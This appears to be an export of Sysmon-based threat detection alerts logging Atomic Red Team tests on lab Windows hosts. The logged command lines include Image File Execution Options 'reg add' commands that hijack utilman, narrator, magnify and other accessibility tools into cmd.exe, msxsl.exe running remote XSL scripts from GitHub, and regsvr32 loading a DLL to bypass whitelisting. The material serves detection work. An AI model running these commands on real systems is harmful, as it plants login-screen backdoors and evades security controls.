10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:list"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547855.991996,2019-07-19T18:50:55.991996+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
3761
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:50:53.038
747F3D96-D8CD-5D31-0000-001047543300
1852
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547853.062635,2019-07-19T18:50:53.062635+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl" ),1,"
1
5
4
1
0
0x8000000000000000
3760
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:50:52.989
747F3D96-D8CC-5D31-0000-001038513300
948
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547853.011281,2019-07-19T18:50:53.011281+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
3759
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:50:50.067
747F3D96-D8CA-5D31-0000-0010CF443300
6268
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547850.086593,2019-07-19T18:50:50.086593+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl" ),1,"
1
5
4
1
0
0x8000000000000000
3758
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:50:50.029
747F3D96-D8CA-5D31-0000-0010DA413300
4004
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1563547850.046476,2019-07-19T18:50:50.046476+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ams15s30-in-f4.1e100.net ) , IP ( 172.217.17.132 ) and port ( 80 )",3,"
3
5
4
3
0
0x8000000000000000
3757
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
Suspicious NetCon
2019-07-19 14:50:20.871
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
MSEDGEWIN10\IEUser
tcp
true
false
10.0.2.15
MSEDGEWIN10.home
49727
false
172.217.17.132
ams15s30-in-f4.1e100.net
80
http
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547825.37603,2019-07-19T18:50:25.376030+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
3756
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:50:19.533
747F3D96-D8AB-5D31-0000-0010A4D53200
1888
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547819.491237,2019-07-19T18:50:19.491237+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1,"
1
5
4
1
0
0x8000000000000000
3753
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:50:19.455
747F3D96-D8AB-5D31-0000-001054D03200
6244
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547819.467476,2019-07-19T18:50:19.467476+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
3752
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:50:18.000
747F3D96-D8AA-5D31-0000-0010C0C93200
6016
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547817.963904,2019-07-19T18:50:17.963904+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1,"
1
5
4
1
0
0x8000000000000000
3749
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:50:17.916
747F3D96-D8A9-5D31-0000-001072C43200
6068
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547817.941637,2019-07-19T18:50:17.941637+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
3748
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:50:14.762
747F3D96-D8A6-5D31-0000-0010F9B13200
6664
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547814.692289,2019-07-19T18:50:14.692289+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1,"
1
5
4
1
0
0x8000000000000000
3745
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:50:14.649
747F3D96-D8A6-5D31-0000-001053A73200
6888
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547814.678185,2019-07-19T18:50:14.678185+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
3744
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:50:13.173
747F3D96-D8A5-5D31-0000-0010C0A03200
6116
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547813.127595,2019-07-19T18:50:13.127595+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1,"
1
5
4
1
0
0x8000000000000000
3741
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:50:13.096
747F3D96-D8A5-5D31-0000-0010729B3200
4212
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547813.109148,2019-07-19T18:50:13.109148+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
3740
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:50:10.306
747F3D96-D8A2-5D31-0000-0010D8943200
2484
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547810.282757,2019-07-19T18:50:10.282757+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1,"
1
5
4
1
0
0x8000000000000000
3737
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:50:10.253
747F3D96-D8A2-5D31-0000-00108A8F3200
6156
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547810.26663,2019-07-19T18:50:10.266630+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
3736
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:50:07.335
747F3D96-D89F-5D31-0000-0010BC823200
2404
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1003 ] Credential Dumping ImageLoad,1603194669.842764,2020-10-20T15:51:09.842764+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7,"
7
3
4
7
0
0x8000000000000000
1103
Microsoft-Windows-Sysmon/Operational
DESKTOP-NTSSLJD
-
2020-10-20 11:51:09.588
23F38D93-CEB4-5F8E-9F08-000000000C00
9392
C:\Windows\System32\mmc.exe
C:\Windows\System32\samlib.dll
10.0.18362.1049 (WinBuild.160101.0800)
SAM Library DLL
Microsoft® Windows® Operating System
Microsoft Corporation
SAMLib.DLL
SHA1=508CE06737747BC14DF3A4337F8A63B76472C629,MD5=0B4202913B86A44A0FAE7B80D425CDF8,SHA256=3501320367877A6EC814CAB179D329D41E32748F01973F5A053D5801DFC9594B,IMPHASH=3B8923EB77916A851639B50DFA19881B
true
Microsoft Windows
Valid
",DESKTOP-NTSSLJD,Microsoft-Windows-Sysmon/Operational
[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1603194669.842764,2020-10-20T15:51:09.842764+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"
7
3
4
7
0
0x8000000000000000
1103
Microsoft-Windows-Sysmon/Operational
DESKTOP-NTSSLJD
-
2020-10-20 11:51:09.588
23F38D93-CEB4-5F8E-9F08-000000000C00
9392
C:\Windows\System32\mmc.exe
C:\Windows\System32\samlib.dll
10.0.18362.1049 (WinBuild.160101.0800)
SAM Library DLL
Microsoft® Windows® Operating System
Microsoft Corporation
SAMLib.DLL
SHA1=508CE06737747BC14DF3A4337F8A63B76472C629,MD5=0B4202913B86A44A0FAE7B80D425CDF8,SHA256=3501320367877A6EC814CAB179D329D41E32748F01973F5A053D5801DFC9594B,IMPHASH=3B8923EB77916A851639B50DFA19881B
true
Microsoft Windows
Valid
",DESKTOP-NTSSLJD,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548027.083068,2019-07-19T18:53:47.083068+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c IF %%PROCESSOR_ARCHITECTURE%% ==AMD64 ELSE ),1,"
1
5
4
1
0
0x8000000000000000
4046
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:53:46.938
747F3D96-D97A-5D31-0000-00102BE33800
4628
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c IF %%PROCESSOR_ARCHITECTURE%% ==AMD64 ELSE
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1563548026.975169,2019-07-19T18:53:46.975169+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll)",1,"
1
5
4
1
0
0x8000000000000000
4045
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:53:46.867
747F3D96-D97A-5D31-0000-001019DE3800
5828
C:\Windows\System32\regsvr32.exe
10.0.17763.1 (WinBuild.160101.0800)
Microsoft(C) Register Server
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Regsvr32,1563548026.975169,2019-07-19T18:53:46.975169+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1,"
1
5
4
1
0
0x8000000000000000
4045
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:53:46.867
747F3D96-D97A-5D31-0000-001019DE3800
5828
C:\Windows\System32\regsvr32.exe
10.0.17763.1 (WinBuild.160101.0800)
Microsoft(C) Register Server
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548026.975169,2019-07-19T18:53:46.975169+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1,"
1
5
4
1
0
0x8000000000000000
4045
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:53:46.867
747F3D96-D97A-5D31-0000-001019DE3800
5828
C:\Windows\System32\regsvr32.exe
10.0.17763.1 (WinBuild.160101.0800)
Microsoft(C) Register Server
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
